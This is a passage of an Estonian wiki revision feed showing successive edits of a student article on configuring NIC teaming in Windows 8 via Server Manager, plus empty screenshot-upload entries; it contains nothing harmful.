Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli. PowerShellis saab NIC Teamingut ka valmis vastustega ära seadistada, mis teeb paigalduse vajadusel veelgi lihtsamaks.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
* Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab wizardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* Ette tuleb wizardi aken, kuhu tuleb sisestada soovitud uue teami nimi ja valida valikust vajalikud võrguadapterid. Antud adapterid siis lisatakse teami.&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* OK vajutades läheb hetk aega ja siis ilmub &amp;quot;Teams&amp;quot; listi uus team eelnevalt sisestatud nimega.&lt;br /&gt;
Peale valmimist on võimalik ka näha teami staatust koos erinevate andmetega. Nii vähe ongi vaja, et teha valmis NIC Teaming uues tulevas Windowsis.&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Minnes arvuti &amp;quot;Network Connections&amp;quot; alla on näha, et sinna on tekkinud juurde uus võrk.&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Antud pildi pealt on näha, kuidas teami &amp;quot;DemoTeam&amp;quot; staatuses on Warning. Pildilt on ka näha, et üks võrgukaartidest on lahti ühendatud, kuid tänu NIC Teamingule toimib võrguühendus ikka sama moodi edasi. Pingimine ei katke, ega ka failide kopeerimine või downloadimine.&lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
* Windows Server 8 - Sneak Peek WPC 2011 - HyperV Replica - http://www.youtube.com/watch?v=Xz9f2G7drEg&amp;amp;feature=related &lt;br /&gt;
* http://www.aidanfinn.com/?p=11787&lt;br /&gt;
* http://workinghardinit.wordpress.com/2011/09/21/windows-8-server-developer-preview-nic-teaming-in-the-operating-system-works-just-fine/&lt;br /&gt;
* http://virtualisationandmanagement.wordpress.com/2011/09/16/windows-8-server-native-support-for-nic-teaming/&lt;br /&gt;
* http://blog.concurrency.com/infrastructure/windows-8-nic-teaming-and-networking/&lt;br /&gt;
&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37988</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37988"/>
		<updated>2011-10-10T20:31:56Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Loading...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli. PowerShellis saab NIC Teamingut ka valmis vastustega ära seadistada, mis teeb paigalduse vajadusel veelgi lihtsamaks.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
* Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab wizardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* Ette tuleb wizardi aken, kuhu tuleb sisestada soovitud uue teami nimi ja valida valikust vajalikud võrguadapterid. Antud adapterid siis lisatakse teami.&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* OK vajutades läheb hetk aega ja siis ilmub &amp;quot;Teams&amp;quot; listi uus team eelnevalt sisestatud nimega.&lt;br /&gt;
Peale valmimist on võimalik ka näha teami staatust koos erinevate andmetega. Nii vähe ongi vaja, et teha valmis NIC Teaming uues tulevas Windowsis.&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Minnes arvuti &amp;quot;Network Connections&amp;quot; alla on näha, et sinna on tekkinud juurde uus võrk.&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Antud pildi pealt on näha, kuidas teami &amp;quot;DemoTeam&amp;quot; staatuses on Warning. Pildilt on ka näha, et üks võrgukaartidest on lahti ühendatud, kuid tänu NIC Teamingule toimib võrguühendus ikka sama moodi edasi. Pingimine ei katke, ega ka failide kopeerimine või downloadimine.&lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
* Windows Server 8 - Sneak Peek WPC 2011 - HyperV Replica - http://www.youtube.com/watch?v=Xz9f2G7drEg&amp;amp;feature=related &lt;br /&gt;
* http://www.aidanfinn.com/?p=11787&lt;br /&gt;
* http://workinghardinit.wordpress.com/2011/09/21/windows-8-server-developer-preview-nic-teaming-in-the-operating-system-works-just-fine/&lt;br /&gt;
* http://virtualisationandmanagement.wordpress.com/2011/09/16/windows-8-server-native-support-for-nic-teaming/&lt;br /&gt;
* http://blog.concurrency.com/infrastructure/windows-8-nic-teaming-and-networking/&lt;br /&gt;
&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37972</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37972"/>
		<updated>2011-10-10T20:18:55Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Loading...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
* Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab wizardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* Ette tuleb wizardi aken, kuhu tuleb sisestada soovitud uue teami nimi ja valida valikust vajalikud võrguadapterid. Antud adapterid siis lisatakse teami.&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* OK vajutades läheb hetk aega ja siis ilmub &amp;quot;Teams&amp;quot; listi uus team eelnevalt sisestatud nimega.&lt;br /&gt;
Peale valmimist on võimalik ka näha teami staatust koos erinevate andmetega. Nii vähe ongi vaja, et teha valmis NIC Teaming uues tulevas Windowsis.&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Minnes arvuti &amp;quot;Network Connections&amp;quot; alla on näha, et sinna on tekkinud juurde uus võrk.&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* &lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37946</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37946"/>
		<updated>2011-10-10T20:06:33Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Loading...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
----&lt;br /&gt;
1.	Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab wizardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
2.      Ette tuleb wizardi aken, kuhu tuleb sisestada soovitud uue teami nimi ja valida valikust vajalikud võrguadapterid. Antud adapterid siis lisatakse teami.&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
3.      OK vajutades läheb hetk aega ja siis ilmub &amp;quot;Teams&amp;quot; listi uus team eelnevalt sisestatud nimega.&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37934</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37934"/>
		<updated>2011-10-10T19:54:51Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Loading...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
----&lt;br /&gt;
1.	Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab wizardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:NIC_t7b.jpg&amp;diff=37931</id>
		<title>File:NIC t7b.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:NIC_t7b.jpg&amp;diff=37931"/>
		<updated>2011-10-10T19:54:09Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:NIC_t6b.jpg&amp;diff=37930</id>
		<title>File:NIC t6b.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:NIC_t6b.jpg&amp;diff=37930"/>
		<updated>2011-10-10T19:54:01Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:NIC_t5b.jpg&amp;diff=37929</id>
		<title>File:NIC t5b.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:NIC_t5b.jpg&amp;diff=37929"/>
		<updated>2011-10-10T19:53:52Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:NIC_Teaming.JPG&amp;diff=37911</id>
		<title>File:NIC Teaming.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:NIC_Teaming.JPG&amp;diff=37911"/>
		<updated>2011-10-10T19:43:53Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37909</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37909"/>
		<updated>2011-10-10T19:41:04Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Loading...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
----&lt;br /&gt;
1.	Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab wizardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:NIC_t7.jpg&amp;diff=37906</id>
		<title>File:NIC t7.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:NIC_t7.jpg&amp;diff=37906"/>
		<updated>2011-10-10T19:30:30Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:NIC_t6.jpg&amp;diff=37904</id>
		<title>File:NIC t6.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:NIC_t6.jpg&amp;diff=37904"/>
		<updated>2011-10-10T19:30:20Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:NIC_t5.jpg&amp;diff=37903</id>
		<title>File:NIC t5.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:NIC_t5.jpg&amp;diff=37903"/>
		<updated>2011-10-10T19:30:11Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
</feed>